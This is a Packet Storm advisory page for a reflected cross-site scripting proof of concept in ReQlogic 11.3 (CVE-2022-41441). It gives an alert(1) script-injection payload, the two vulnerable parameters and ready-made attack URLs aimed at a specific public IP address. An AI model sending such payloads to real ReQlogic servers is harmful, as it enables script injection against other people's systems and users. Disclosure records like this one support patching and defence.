Lucene search

K
packetstormOkan KurtulusPACKETSTORM:171557
HistoryMar 28, 2023 - 12:00 a.m.

ReQlogic 11.3 Cross Site Scripting

2023-03-2800:00:00
Okan Kurtulus
packetstormsecurity.com
125
reqlogic
cross-site scripting
linux
cve 2022-41441
xss payload

0.002 Low

EPSS

Percentile

52.9%

`# Exploit Title: ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS)  
# Date: 9 October 2022  
# Exploit Author: Okan Kurtulus  
# Vendor Homepage: https://reqlogic.com  
# Version: 11.3  
# Tested on: Linux  
# CVE : 2022-41441  
  
# Proof of Concept:  
1- Install ReQlogic v11.3  
2- Go to https://localhost:81/ProcessWait.aspx?POBatch=test&WaitDuration=3  
3- XSS is triggered when you send the XSS payload to the POBatch and WaitDuration parameters.  
  
#XSS Payload:  
</script><script>alert(1)</script>  
  
#Affected Prameters  
POBatch  
WaitDuration  
  
#Final URLs  
http://20.36.214.225:81/ProcessWait.aspx?POBatch=</script><script>alert(1)</script>&WaitDuration=3  
http://20.36.214.225:81/ProcessWait.aspx?POBatch=test&WaitDuration=</script><script>alert(1)</script>  
  
`

0.002 Low

EPSS

Percentile

52.9%

Related for PACKETSTORM:171557